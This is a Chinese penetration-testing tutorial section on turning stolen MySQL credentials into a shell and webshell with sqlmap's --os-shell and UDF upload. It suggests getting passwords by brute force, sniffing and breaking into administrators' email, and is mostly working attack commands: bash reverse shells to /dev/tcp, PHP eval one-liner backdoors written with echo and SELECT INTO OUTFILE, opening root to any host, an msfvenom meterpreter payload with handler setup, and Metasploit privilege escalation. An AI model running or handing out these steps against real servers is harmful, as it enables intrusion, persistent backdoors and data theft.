4.3 使用sqlmap直连MySQL获取webshell
在一些场景下,需要通过MySQL直接连接来获取权限,如果通过暴力破解,嗅探等方法获取了账户和密码,而服务器没开放Web服务的情况,那么就得直接通过数据库获取一定的权限了
4.3.1 使用场景
(1) 获取了MySQL数据库账户和密码
(2) 可以访问3306端口及数据库
4.3.2 扫描获取root账户的密码
通常有下面一些方法来获取root账户的密码
(1) phpMyAdmin 多线程批量破解工具,可以通过收集phpMyAdmin地址进行暴力破解
(2) 代码泄露获取数据库账户和密码
(3) 文件包含读取配置文件中的数据库账户和密码
(4) 通过网络嗅探获取
(5) 渗透运维人员的邮箱及个人主机获取
4.3.3 获取shell
1. 通过sqlmap连接MySQL获取shell
(1) 直接连接数据库
sqlmap.py -d "mysql://root:123456@127.0.0.1:3306/mysql" --os-shell
需要注意的小细节
mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' or 'access://DATABASE_FILEPATH'
https://github.com/PyMySQL/PyMySQL
pip install PyMySQL
======================================================================================================
SQLAlchemy not available
pip install SQLAlchemy
============================================================================================================
[CRITICAL] SQLAlchemy connection issue ('ModuleNotFoundError: No module named 'MySQLdb'')
pip install mysql-connector-python-rf
pip install wheel
pip install -i https://pypi.douban.com/simple/ mysql-connector-python-rf
最终在kali环境下安装如下模块即可连接
apt-get install python-mysqldb
https://stackoverflow.com/questions/22252397/importerror-no-module-named-mysqldb
pip install pymysql 经过测试,安装此模块即可解决问题
=======================================================================================
解决本地搭建环境可以直接通过sqlmap的-d参数直接利用mysql获取交互式shell
参考文档:
https://xz.aliyun.com/t/7416 此篇先知的文章并未详细说明,按照此文章的方法并未成功,结果是通过下面的文章解决问题
https://www.cnblogs.com/caya-yuan/p/11898915.html
具体操作的命令如下:
cd /usr/lib/systemd/system
vim mariadb.service
将如下默认的mysql用户改成root权限用户
[Service]
Type=simple
#User=mysql
#Group=mysql
Group=root
User=root
systemctl daemon-reload
systemctl start mariadb.service
ps -ef | grep mysql -- 这个是查看是不是root用户运行的,确认没有问题就可以开始操作下面的命令进行提权生成交互式shell吧
=======================================================================================
python sqlmap.py -d "mysql://root:root@106.54.35.126:3306/mysql" --os-shell 这个测试环境是我自己的vps
效果展示:
=======================================================================================
python sqlmap.py -d "mysql://root:root@106.54.35.126:3306/mysql" --os-shell
(2) 通过选择32位或者64位操作系统webshell,执行
bash -i >& /dev/tcp/10.12.22.33/8899 0>&1
(3) 反弹到服务器10.12.22.33 实际的环境中就是自己的独立公网IP地址
(4) 通过echo命令生成shell
echo "<?php @eval($_POST['bmfx']);?>" > /var/www/html/data/phpmyadmin/bmfx.php
如果可以通过phpmyadmin管理数据库,就可以修改host为"%" 并执行权限更新操作,具体如下:
use mysql;
update user set host = '%' where user = 'root';
flush privileges;
注意:如果数据库中有都个host连接,修改时可能会导致数据库连接出问题
2. 通过MSF反弹获取shell
(1) 使用msfvenom生成MSF反弹的PHP脚本木马,默认端口4444
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.12.22.33 -f raw > bmfx.php
(2) 在独立IP或者反弹服务器上运行MSF依次执行一下命令
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.12.22.33 //这个IP地址就是自己的独立服务器IP地址,
show options
run 0 或者 exploit
(3) 上传并执行PHP文件
将上面生成的bmfx.php文件上传至目标站点,然后访问,如果没有问题的话,那么MSF会显示成功反弹shell
3. 通过PHPMyAdmin管理解码查询生成webshell
select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE 'F:/phpstudy/www/bmfx.php'
4.3.4 实例演示
1. 直接连接MySQL数据库
sqlmap.py -d "mysql:/root:123456@xxx.xx.xx.xx:3306/mysql" --os-shell
如果上述成功了, 会让你选中服务器架构是32位还是64位
2. 上传UDF文件
在上述操作选择系统架构之后,sqlmap会自动上传UDF文件到服务器提权位置,记住,不管获取的shell是否成功都会显示os-shell提示符
3. 执行命令
cat /etc/passwd
如果是真的成功获取了shell,那么执行的结果就是我们想要的信息
4. 获取反弹shell
虽然通过sqlmap获取了shell,但实际操作的话着实不方便,需要使用独立的服务器进行反弹shell
nc -lvnp 9988
在sqlmap的shell执行
bash -i >& /dev/tcp/10.12.22.33:9988 0>&1
5. 在服务器上生成webshell
上述操作如果没有任何问题,那么就可以找到真实路径直接生成webshell,可以在获取的反弹shell中执行locate *.php找到网站的真实路径,然后在该路径下通过echo命令生成webshell,具体如下:
echo "<?php @eval($_POST['bmfx]);?>" > bmfx.php
6. 获取webshell
上面在服务器上生成的webshell是一句话,可以通过中国菜刀连接此一句话,进行获取webshell
7. 通过phpMyAdmin生成一句话后门
select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE '/var/www/phpmyadmin/bmfx.php'
8. 通过MSF反弹获取shell
9. MSF提权参考
通过MSF反弹shell,执行background将Session放在后台运行,然后搜索可以利用的exploit来进行测试,具体命令如下:
background
search "关键字" //这里是跟漏洞相关的关键字,比如search tomcat 等等
use exploit/linux
show options
set session 1
exploit
sessions -i 1
getuid
实战测试,可用参考这边文章:https://xz.aliyun.com/t/7416